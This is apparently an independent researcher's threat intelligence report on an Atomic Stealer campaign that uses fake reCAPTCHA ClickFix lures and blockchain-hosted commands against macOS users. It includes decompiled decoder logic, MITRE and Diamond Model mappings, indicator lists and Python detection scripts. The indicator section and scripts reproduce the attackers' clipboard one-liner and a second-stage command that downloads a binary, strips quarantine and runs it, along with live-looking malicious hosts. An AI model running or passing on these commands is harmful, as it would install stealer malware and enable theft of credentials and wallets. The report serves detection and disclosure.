char var_49_1 = 1;
sub_100000ad0(&var_38); // Cleans up table
return arg1;
}
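An added Python re-implementation (not the binary’s code) of the loop in the HLIL above, keeping the HLIL variable names: a 256-entry table built from an alphabet string, 6 bits accumulated per accepted input byte, and one output byte emitted whenever 8 bits are pending, which is the shape of a Base64 decoder with a caller-supplied alphabet. The standard alphabet used below is an assumption, since the report does not recover the real arg3 string, and decode_like_binary, build_table and decode_text are names of this example.

```python
"""Mirror of sub_100000680's decoding loop, so the reading of the HLIL can be
checked against the strings captured in this report. arg3 (the alphabet) is
not recovered in the report; the standard Base64 alphabet is assumed here."""

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def build_table(alphabet: str) -> list:
    """sub_100000860 + the first for-loop: var_38[c] = index of c in the alphabet,
    every other entry left at 0xffffffff (-1), which the main loop treats as 'skip'."""
    table = [-1] * 0x100
    for i, ch in enumerate(alphabet):
        table[ord(ch) & 0xff] = i
    return table


def decode_like_binary(data: bytes, alphabet: str = STD_ALPHABET) -> bytes:
    """The while-loop over arg2: var_50 accumulates bits, i_1 counts pending bits,
    arg1 (the std::string) receives one byte each time i_1 reaches 8."""
    table = build_table(alphabet)
    out = bytearray()                                   # arg1
    var_50 = 0
    i_1 = 0
    for rax_14 in data:                                 # *sub_100000a90(&var_68), one input byte
        rax_17 = table[rax_14]                          # *sub_1000008e0(&var_38, byte)
        if rax_17 >= 0:                                 # '=' padding, whitespace etc. map to -1
            var_50 = ((var_50 << 6) | rax_17) & 0xffffffff   # int32 accumulator, as in the HLIL
            i_1 += 6
            while i_1 >= 8:
                i_1 -= 8
                out.append((var_50 >> i_1) & 0xff)      # (var_50 >> i_1.b).b -> push_back
    return bytes(out)


def decode_text(b64: str, alphabet: str = STD_ALPHABET) -> str:
    return decode_like_binary(b64.encode("ascii"), alphabet).decode("utf-8")


if __name__ == "__main__":
    # The clipboard string captured in the report, run through the reconstructed loop.
    captured = ("L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3Av"
                "Mi92ZXJpZnkuc2gpIg==")
    print(decode_text(captured))
    # A different arg3 changes the output without changing the code, which is why the
    # alphabet string (likely in __const) is the thing to recover from the sample.
    print(decode_like_binary(captured.encode("ascii"), STD_ALPHABET[::-1])[:8].hex())
```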
Campaign Scale: A Network of 2,800 Potentially Compromised Sites
The investigation kicked off with agencia2.jornalfloripa[.]com.br, but pivoting from this lead revealed a far broader campaign. With access to research data from Censys and Onyphe, I identified approximately 2,800 websites, spanning diverse domains from news outlets to personal blogs. This partially confirmed list points to a coordinated operation, likely exploiting vulnerabilities in website hosting or content management systems (I am tempted to believe they are all WordPress) and leveraging AMOS’s MaaS model for scale.
The scale is large enough that even viewing the observables is a difficult task:

Tactics, Techniques, and Procedures (TTPs)
Mapped to MITRE ATT&CK:
- Initial Access:
  - T1189: Watering Hole (compromised websites).
  - T1566.004: Phishing (ClickFix/ClearFix fake reCAPTCHA).
- Execution:
  - T1204.002: User Execution (Terminal command).
  - T1059.004: Command and Scripting Interpreter (bash).
- Privilege Escalation:
  - T1548.003: Abuse Elevation Control Mechanism (fake password prompts).
- Credential Access:
  - T1555.003: Credentials from Password Stores (Keychain).
- Collection:
  - T1005: Data from Local System (browser data, wallets).
- Command and Control:
  - T1572: Protocol Tunneling (EtherHiding via Binance Smart Contracts).
  - T1071.001: Application Layer Protocol (HTTP POST to technavix.cloud).
- Exfiltration:
  - T1041: Exfiltration Over C2 Channel (base64-encoded ZIPs).
Recommendations for macOS Users and Defenders
- Detection:
  - Monitor network traffic for POST requests to technavix[.]cloud or salorttactical[.]top.
  - Use endpoint detection and response (EDR) tools to spot Keychain access, system_profiler execution, or osascript activity.
  - Check web server logs for signs of ClickFix/ClearFix or EtherHiding activity.
- Prevention:
  - Block IOCs (domains, IPs, contract addresses) using firewalls or DNS filtering.
  - Educate users to avoid running Terminal commands from untrusted websites, especially those prompted by reCAPTCHA-like interfaces.
  - Implement a strict Content Security Policy (CSP) to block eval or unauthorized scripts.
- Response:
  - Quarantine infected systems and scan with macOS-specific antivirus tools (e.g., Malwarebytes).
  - Analyze /tmp/update in a macOS sandbox to confirm AMOS behavior and extract further IOCs.
  - Reset Keychain passwords, browser credentials, and cryptocurrency wallet access on affected devices.
- Threat Hunting:
  - Use Censys and Onyphe to identify additional compromised sites with similar ClickFix/ClearFix or EtherHiding tactics.
  - Monitor Binance Smart Contract activity (e.g., jadeCode, tokyoSkytree) for new campaign variants or updated commands.
Diamond Model of Intrusion Analysis
- Adversary:
- Description: Likely a cybercrime group operating Atomic Stealer (AMOS) as a Malware-as-a-Service (MaaS), sold on Telegram for $1,000–$3,000 monthly. The use of EtherHiding and ClickFix/ClearFix suggests a skilled actor with expertise in blockchain and macOS exploitation. The stealer is sold (as seen in other TI reports) by Telegram user ping3r, who claims to be a guarantor but not the developer.
- Attributes: Operates as a distributed team, leveraging MaaS for scalability. The campaign’s scope (~2,800 sites) indicates significant resources, possibly involving affiliates.
- Edges:
- Adversary-to-Infrastructure: Controls domains (
technavix[.]cloud
,salorttactical[.]top
) and Binance Smart Contracts (0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
,0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
) for command delivery and payload hosting. - Adversary-to-Capability: Deploys ClickFix/ClearFix social engineering, EtherHiding, and a Mach-O binary, reflecting somewhat technical proficiency.
- Adversary-to-Victim: Targets macOS users for financial gain (e.g., wallet theft) or data resale, exploiting trust in reCAPTCHA interfaces.
- Adversary-to-Infrastructure: Controls domains (
- Infrastructure:
- Description: A robust network of ~2,800 compromised websites (e.g.,
agencia2.jornalfloripa[.]com.br
), C2 servers (technavix[.]cloud
), payload hosts (salorttactical[.]top
), and Binance Smart Contracts for EtherHiding. - Attributes: Employs three full-screen iframes (
z-index: 2147483647
) for ClickFix/ClearFix delivery, Cloudflare challenges to evade bots, and blockchain-based command delivery for resilience. - Edges:
- Infrastructure-to-Capability: Hosts obfuscated JavaScript, ClickFix/ClearFix iframes, and the AMOS binary, enabling command execution and data theft.
- Infrastructure-to-Victim: Delivers payloads to macOS devices via compromised websites, with POST requests to
technavix[.]cloud
for tracking. - Infrastructure-to-Adversary: Provides a decentralized C2 framework, with Binance Smart Contracts resisting takedowns.
- Description: A robust network of ~2,800 compromised websites (e.g.,
- Capability:
- Description: Encompasses social engineering (ClickFix/ClearFix), EtherHiding via Binance Smart Contracts, obfuscated JavaScript, and a C++-based Mach-O binary with dynamic command construction.
- Attributes: Uses Base64 encoding,
eval
, andpako.ungzip
for obfuscation, and_system
calls for command execution. Thesub_100000680
function constructs commands via bit manipulation. - Edges:
- Capability-to-Victim: Exploits user trust with ClickFix/ClearFix, prompting Terminal command execution (⌘ + Space, ⌘ + V), and steals Keychain, browser, and wallet data.
- Capability-to-Infrastructure: Relies on compromised websites and blockchain contracts for payload delivery and execution.
- Capability-to-Adversary: Reflects the adversary’s expertise in macOS malware and blockchain integration.
- Victimology:
- Description: macOS users accessing compromised websites, from individuals to organizations using macOS for personal or professional tasks.
- Attributes: Targeted for sensitive data (Keychain credentials, wallets, browser data) and system information, with no specific industry focus, suggesting opportunistic attacks.
- Edges:
- Victim-to-Adversary: Provides valuable data for resale or exploitation, driving the adversary’s objectives.
- Victim-to-Infrastructure: Interacts with compromised websites, triggering ClickFix/ClearFix and EtherHiding payloads.
- Victim-to-Capability: Vulnerable to social engineering and macOS-specific exploits, enabling command execution and data theft.
Analysis: The Diamond Model highlights the adversary’s reliance on a resilient, decentralized infrastructure (Binance Smart Contracts, compromised sites) and sophisticated capabilities, not only to deliver using (ClickFix/ClearFix, EtherHiding) to target macOS users opportunistically but also on the way it obfuscates and hides the compromise. The adversary-to-infrastructure edge is critical, with EtherHiding making it a persistent command delivery, while the capability-to-victim edge exploits user trust. Defenders should disrupt infrastructure (e.g., block domains) and enhance user awareness to break these connections.
Conclusion: A Call to Strengthen macOS Defenses
This investigation, which started with a compromised Brazilian news site, has peeled back the layers of a massive campaign targeting macOS users with Atomic Stealer. The attackers’ use of ClickFix/ClearFix fake reCAPTCHAs and EtherHiding via Binance Smart Contracts showcases a blend of social engineering and technical finesse that challenges conventional defenses. With ~2,800 potentially compromised websites identified, this operation shows the growing threat to macOS environments. My gratitude goes to Censys and Onyphe for providing the research data that made this discovery possible. As an independent researcher, I urge macOS users and defenders to act on these findings and implement the recommended mitigations. The battle against cybercrime is relentless, but every step toward awareness and resilience makes a difference.
Indicators of Compromise (IOCs)
- Domains:
- technavix[.]cloud: Probable C2 (initial platform checker; /popup and /copy endpoints).
- salorttactical[.]top: Payload host (/2/verify.sh, /update).
- Not inherently malicious, but worth looking for in enterprise environments: bsc-dataseed.binance.org.
- Smart Contract Addresses:
- 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA: Delivers jadeCode.
- 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53: Delivers decompressedScript.
- Full list of BSC contracts:
0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
0xa6165aa33ac710ad5dcd4f4d6379466825476fde
0x8FBA1667BEF5EdA433928b220886A830488549BD
0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
- Commands:
- Clipboard: echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==' | base64 -D | sh (the Base64 decodes to /bin/bash -c "$(curl -fsSL https://salorttactical[.]top/2/verify.sh)").
- Second-stage: curl -o /tmp/update https://salorttactical[.]top/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update (xattr -c clears all extended attributes, including com.apple.quarantine, so Gatekeeper never assesses the downloaded binary).
- Binary hash (SHA-256, VirusTotal): 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c
- Binary UUID: e8633716-8673-317e-bcd4-2616e5956cef
- Console logs: “Start moving...”, “Moved.”, “Road unavaible:” (sic; the misspelling is part of the string and should be matched as written)
- Behavioral indicators:
- ClickFix/ClearFix fake reCAPTCHA with macOS-specific shortcuts (⌘ + Space, ⌘ + V).
- Clipboard manipulation via copyToClipboard().
- Full-screen iframes with high z-index (2147483647).
- External resources:
https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/ReCAPTCHA_icon.svg/220px-ReCAPTCHA_icon.svg.png
- List of potentially compromised sites, ~2,800 (I verified around 500 of them; I have high confidence that almost all are or have been compromised by what is described in this article, but this needs double checking):
pontopositivosc[.]com
test.enigmait[.]co
tigrus[.]us
lescourtoises[.]fr
multicopi.com[.]br
assiaspose[.]it
www.esqbusiness[.]net
www.zbo.bwk.mybluehost[.]me
ggcafe.eezitek[.]com
longomgmt[.]co
gonilehealth[.]com
marcelacihlarova[.]cz
3tagenciadenegocios.com[.]br
....
Find more on: Host-list
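The two commands listed under IOCs above share a shape that endpoint telemetry can match without knowing the exact Base64 string or domain: a Base64 blob echoed into base64 -D and then into a shell, and a curl download followed by xattr -c, chmod +x and execution of the same path. The script below is an added example written for this article, not code from the original report. It refangs the [.] notation, decodes the piped Base64 so the hidden fetch-and-run command and its host become visible, and flags the quarantine-strip chain; the clipboard and second-stage samples are the report's own IOC strings, the two benign samples are constructed.

```python
"""Classify shell one-liners from clipboard contents or process telemetry against
the command shapes in this report's IOC list. Added example for this article,
not code from the original report. Sample inputs: the report's two IOC strings
plus two constructed benign commands.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# ClickFix clipboard shape: echo '<base64>' | base64 -D | sh
# (-D is the macOS flag; -d/--decode cover the Linux spelling a variant might use).
B64_TO_SHELL = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/]{16,}={0,2})['\"]?\s*\|\s*"
    r"base64\s+(?:-D|-d|--decode)\s*\|\s*(?:sh|bash|zsh)\b"
)
# Second-stage shape: download to a path, clear xattrs on it (drops
# com.apple.quarantine), chmod +x the same path, then execute that path.
STAGE2 = re.compile(
    r"curl\b[^&|;]*?-o\s+(\S+).*?&&\s*xattr\s+-c\s+\1\s*&&\s*chmod\s+\+x\s+\1\s*&&\s*\1\b",
    re.S,
)
URL = re.compile(r"https?://[^\s\"'|)<>]+")


def refang(text: str) -> str:
    """Undo the [.] / hxxp defanging used in reports so URLs parse."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def decode_piped_base64(cmd: str):
    """Return the decoded payload if cmd pipes a Base64 blob into a shell, else None."""
    m = B64_TO_SHELL.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # not valid Base64: keep the regex hit out of the findings


def triage_command(cmd: str) -> dict:
    cmd = refang(cmd)
    findings = []
    url_text = cmd
    decoded = decode_piped_base64(cmd)
    if decoded is not None:
        findings.append("base64_piped_to_shell")
        url_text += "\n" + decoded
        # $(curl ...) or curl ... | sh inside the decoded payload: fetch-and-run
        if re.search(r"\$\(\s*curl\b|curl\b[^|]*\|\s*(?:sh|bash)\b", decoded):
            findings.append("remote_script_execution")
    m = STAGE2.search(cmd)
    if m:
        findings.append("quarantine_strip_and_execute")
        if m.group(1).startswith("/tmp/"):
            findings.append("payload_in_tmp")
    hosts = sorted({urlparse(u).hostname for u in URL.findall(url_text)} - {None})
    return {
        "verdict": "malicious" if findings else "clean",
        "findings": findings,
        "decoded": decoded,
        "hosts": hosts,
    }


# CLIPBOARD_CMD and STAGE2_CMD are the report's IOC strings; the rest are constructed.
CLIPBOARD_CMD = (
    "echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg=='"
    " | base64 -D | sh"
)
STAGE2_CMD = (
    "curl -o /tmp/update https://salorttactical[.]top/update && xattr -c /tmp/update"
    " && chmod +x /tmp/update && /tmp/update"
)
BENIGN_B64 = "echo 'aGVsbG8gd29ybGQsIHRoaXMgaXMgZmluZQ==' | base64 -d > /tmp/note.txt"
BENIGN_LS = "ls -la /tmp"

if __name__ == "__main__":
    for cmd in (CLIPBOARD_CMD, STAGE2_CMD, BENIGN_B64, BENIGN_LS):
        print(triage_command(cmd))
```

The Base64 sample that is merely decoded to a file is not flagged: the detection keys on the pipe into a shell, not on the presence of base64, which keeps false positives from ordinary scripting low. A real EDR rule would feed process command lines into triage_command and alert on any non-empty findings list.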
OPERATIONAL UPDATE (as of May 7th):
Adversary Disruption Update:
1: technavix[.]cloud and salorttactical[.]top are no longer resolving.
2: The TA has stopped delivering ClickFix (for now) for both Windows and Mac.
3: Binance transactions are still happening in the background for almost all compromised sites, so there is a chance of infrastructure rotation.
4: nc1.overallwobbly[.]ru is still operational (Windows payload delivery).